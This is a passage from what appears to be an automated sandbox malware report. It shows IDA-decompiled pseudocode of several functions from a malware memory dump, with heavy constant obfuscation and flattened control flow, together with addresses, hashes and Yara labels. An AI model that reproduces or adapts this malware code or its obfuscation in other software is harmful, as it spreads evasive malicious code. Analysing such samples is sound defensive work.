				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0035DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E0034B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E00348969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E003447CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0035DCF7(_v1612, 0x341328, _t395),  &_v520, _v1672, _v1680);
							E0034A8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E0034EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E0034AB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}

0x00351889
0x0035188f
0x003518a1
0x003518a3
0x003518aa
0x003518af
0x003518b7
0x003518bc
0x003518c4
0x003518cc
0x003518d0
0x003518d5
0x003518db
0x003518e0
0x003518e8
0x003518f0
0x003518f9
0x003518fe
0x00351904
0x0035190c
0x00351914
0x00351920
0x00351925
0x0035192b
0x00351933
0x0035193b
0x00351943
0x0035194b
0x00351953
0x00351960
0x00351963
0x00351967
0x0035196f
0x00351977
0x0035197f
0x0035198f
0x00351993
0x0035199b
0x003519a3
0x003519ab
0x003519b3
0x003519bb
0x003519c3
0x003519cb
0x003519d7
0x003519dc
0x003519e2
0x003519ea
0x003519f2
0x003519fa
0x00351a02
0x00351a0e
0x00351a11
0x00351a15
0x00351a1f
0x00351a27
0x00351a35
0x00351a3a
0x00351a3e
0x00351a46
0x00351a4e
0x00351a56
0x00351a5b
0x00351a63
0x00351a6b
0x00351a73
0x00351a7b
0x00351a83
0x00351a8b
0x00351a93
0x00351a9b
0x00351aa3
0x00351aab
0x00351ab9
0x00351abe
0x00351ac2
0x00351aca
0x00351ad2
0x00351ae0
0x00351ae5
0x00351ae9
0x00351af1
0x00351b00
0x00351b01
0x00351b05
0x00351b0a
0x00351b12
0x00351b1a
0x00351b27
0x00351b2b
0x00351b30
0x00351b35
0x00351b3d
0x00351b4d
0x00351b51
0x00351b59
0x00351b61
0x00351b69
0x00351b6e
0x00351b76
0x00351b7e
0x00351b86
0x00351b93
0x00351b97
0x00351b9f
0x00351ba7
0x00351baf
0x00351bb7
0x00351bc5
0x00351bc9
0x00351bd6
0x00351bde
0x00351be2
0x00351bea
0x00351bf2
0x00351bfa
0x00351c02
0x00351c0a
0x00351c12
0x00351c1a
0x00351c22
0x00351c27
0x00351c2f
0x00351c3c
0x00351c40
0x00351c48
0x00351c50
0x00351c5d
0x00351c61
0x00351c66
0x00351c6b
0x00351c73
0x00351c7b
0x00351c80
0x00351c84
0x00351c8c
0x00351c9a
0x00351d93
0x00000000
0x00351ca0
0x00351ca0
0x00351ca6
0x00351dc6
0x00351dc6
0x00351dcc
0x00000000
0x00000000
0x00351cac
0x00351cc5
0x00351cf6
0x00351cfd
0x00351d02
0x00351d0b
0x00351d4c
0x00351d5e
0x00351d7c
0x00351d80
0x00351d85
0x00351d8a
0x00351d8c
0x00000000
0x00351d8c
0x00351d8a
0x00351ca6
0x00351ddc
0x00351ddc
0x00351d9d
0x00351da8
0x00351da9
0x00351daa
0x00351dab
0x00351dac
0x00351db4
0x00351db8
0x00351db9
0x00351dbe
0x00351dc1
0x00000000

Strings

)b}, xrefs: 0035194B
x, xrefs: 003518CC

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )b}$ x
API String ID: 0-2724122486
Opcode ID: aa189e850ec8247db739c2801c8db6323bc1d9539d9d3a589bc7cffd1eb46196
Instruction ID: 8c894930f043933fff2d3dc4edcfc502f2efe9fdf42151e36b8e26be5fa59092
Opcode Fuzzy Hash: aa189e850ec8247db739c2801c8db6323bc1d9539d9d3a589bc7cffd1eb46196
Instruction Fuzzy Hash: 16D121715083819FE368CF60C48A95BFBF2FBC4358F108A1DF6999A260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0035473C Relevance: 2.7, Strings: 2, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0035473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E0034912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x363e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E00358F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E0034E249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E003442C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E00358F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}

0x0035473c
0x0035473f
0x00354749
0x00354751
0x0035475a
0x0035475c
0x00354760
0x00354768
0x00354770
0x00354778
0x00354780
0x00354788
0x00354793
0x00354798
0x0035479e
0x003547a3
0x003547ab
0x003547b8
0x003547bb
0x003547bf
0x003547c7
0x003547cf
0x003547d7
0x003547db
0x003547e0
0x003547e1
0x003547e5
0x003547ed
0x003547f5
0x00354803
0x00354807
0x0035480f
0x0035481c
0x00354820
0x00354828
0x00354830
0x00354838
0x00354840
0x00354848
0x00354850
0x00354858
0x00354862
0x00354866
0x0035486e
0x00354876
0x0035487e
0x00354886
0x0035488e
0x0035489b
0x0035489f
0x003548a7
0x003548af
0x003548b4
0x003548b9
0x003548c1
0x003548c9
0x003548d1
0x003548d9
0x003548e1
0x003548e9
0x003548f1
0x003548f9
0x00354901
0x00354909
0x00354910
0x00354915
0x0035491d
0x00354925
0x0035492d
0x00354935
0x00354944
0x00354947
0x0035494b
0x00354955
0x00354959
0x00354961
0x00354969
0x00354971
0x00354976
0x0035497e
0x0035498e
0x00354992
0x0035499a
0x003549a2
0x003549aa
0x003549b2
0x003549ba
0x003549bf
0x003549c7
0x003549cf
0x003549d7
0x003549df
0x003549eb
0x003549ee
0x003549f2
0x003549f6
0x003549fa
0x00354a03
0x00354a0b
0x00354a13
0x00354a18
0x00354a20
0x00354a28
0x00354a28
0x00354a28
0x00354a2b
0x00354a3d
0x00354b36
0x00354b3b
0x00354b3d
0x00354b42
0x00354b44
0x00000000
0x00354b44
0x00354a43
0x00354a49
0x00354b16
0x00000000
0x00354a4f
0x00354a55
0x00354af9
0x00354aff
0x00354b07
0x00354b04
0x00354b04
0x00354b0c
0x00354b0f
0x00000000
0x00354a5b
0x00354a61
0x00354aea
0x00354aef
0x00354af2
0x00000000
0x00354a63
0x00354a65
0x00354ab7
0x00354abe
0x00354ac4
0x00354ac7
0x00354acc
0x00354ace
0x00354acf
0x00354acf
0x00000000
0x00354a67
0x00354a6d
0x00354b71
0x00354b77
0x00000000
0x00000000
0x00354a73
0x00354a8f
0x00354a91
0x00354a9b
0x00354aa0
0x00000000
0x00354aa0
0x00354a6d
0x00354a65
0x00354a61
0x00354a55
0x00354a49
0x00354b86
0x00354b86
0x00354b5c
0x00354b61
0x00354b64
0x00354b69
0x00354b70
0x00000000
0x00354b70

Strings

mU`, xrefs: 003549A2
^T, xrefs: 003547CF

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^T$mU`
API String ID: 0-1245783925
Opcode ID: 963fb97ccbfcfd75506bec0b87a918fc0a856e47e649343b3e3046a306ed93df
Instruction ID: 8c7adde3f5dcb54a6c822d42f99e5ddb9ec63b09dce3dfab1add046ab36d231c
Opcode Fuzzy Hash: 963fb97ccbfcfd75506bec0b87a918fc0a856e47e649343b3e3046a306ed93df
Instruction Fuzzy Hash: E7B122715093409FC359CF65998981BFBE1FBC8758F108A1DFA9A96260D3B1CA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0035A666 Relevance: 2.7, Strings: 2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0035A666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E0035DCF7(_v148, 0x341540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E0034A42D(0xab2a8d8a, 0x2b7)))();
								E0034A8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E00350AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E003480E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E00358519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E00347FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E00344816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}

0x0035a666
0x0035a666
0x0035a670
0x0035a674
0x0035a67e
0x0035a68b
0x0035a68f
0x0035a694
0x0035a699
0x0035a6a1
0x0035a6a9
0x0035a6b1
0x0035a6b9
0x0035a6c1
0x0035a6c6
0x0035a6ce
0x0035a6d6
0x0035a6de
0x0035a6e6
0x0035a6ea
0x0035a6ef
0x0035a6f7
0x0035a706
0x0035a709
0x0035a70d
0x0035a715
0x0035a71d
0x0035a722
0x0035a732
0x0035a736
0x0035a73e
0x0035a746
0x0035a74e
0x0035a756
0x0035a75e
0x0035a766
0x0035a76e
0x0035a776
0x0035a783
0x0035a786
0x0035a78a
0x0035a792
0x0035a79a
0x0035a7a2
0x0035a7aa
0x0035a7b2
0x0035a7ba
0x0035a7c2
0x0035a7cf
0x0035a7d3
0x0035a7db
0x0035a7e3
0x0035a7eb
0x0035a7f3
0x0035a7f8
0x0035a800
0x0035a810
0x0035a818
0x0035a81b
0x0035a81f
0x0035a827
0x0035a82f
0x0035a83c
0x0035a842
0x0035a847
0x0035a84f
0x0035a857
0x0035a85c
0x0035a864
0x0035a86c
0x0035a874
0x0035a879
0x0035a881
0x0035a890
0x0035a891
0x0035a895
0x0035a89d
0x0035a8ab
0x0035a8af
0x0035a8b3
0x0035a8b7
0x0035a8bb
0x0035a8c3
0x0035a8cb
0x0035a8cb
0x0035a8cb
0x0035a8d0
0x0035a8d0
0x0035a8de
0x0035a983
0x0035a98c
0x0035a994
0x0035a99b
0x0035a9a7
0x0035a9a8
0x0035a9a9
0x0035a9aa
0x0035a9b6
0x0035a9c2
0x0035a9c7
0x00000000
0x0035a8e4
0x0035a8ea
0x0035a952
0x0035a957
0x0035a95f
0x0035a969
0x0035a96a
0x0035a96b
0x0035a96d
0x0035a972
0x0035a977
0x0035a977
0x0035a97a
0x0035a97a
0x00000000
0x0035a8ec
0x0035a8f2
0x0035a93f
0x00000000
0x0035a8f4
0x0035a8fa
0x0035aa1d
0x0035a900
0x0035a906
0x00000000
0x0035a90c
0x0035a910
0x0035a91f
0x0035a920
0x0035a926
0x0035a930
0x0035a936
0x0035a93a
0x00000000
0x0035a93a
0x0035a906
0x0035a8fa
0x0035a8f2
0x0035a8ea
0x0035aa26
0x0035aa2f
0x0035aa2f
0x0035a9e8
0x0035a9ea
0x0035a9ed
0x0035a9ef
0x0035a9f8
0x0035a9fc
0x0035aa01
0x00000000
0x0035a9f1
0x0035a9f1
0x00000000
0x0035a9f1
0x00000000
0x0035aa06
0x0035aa06
0x0035aa06
0x00000000
0x0035aa12

Strings

^4?, xrefs: 0035A881
iQ, xrefs: 0035A6C6

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^4?$iQ
API String ID: 0-3971506469
Opcode ID: 73a5f1c4d11bc9f8d8c055ccefed52dd51954b72de61fd27094500acfebdf46e
Instruction ID: 3da14650b6750cf4b692c4547ea7a16b8b0b7670d389c0cf5eee9c6c4b6e703d
Opcode Fuzzy Hash: 73a5f1c4d11bc9f8d8c055ccefed52dd51954b72de61fd27094500acfebdf46e
Instruction Fuzzy Hash: 98A162719083409FC354CF29D58990BFBE1BBC4758F41492DF99AAA260C7B5D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00358BE3 Relevance: 2.7, Strings: 2, Instructions: 204
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00358BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x363e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
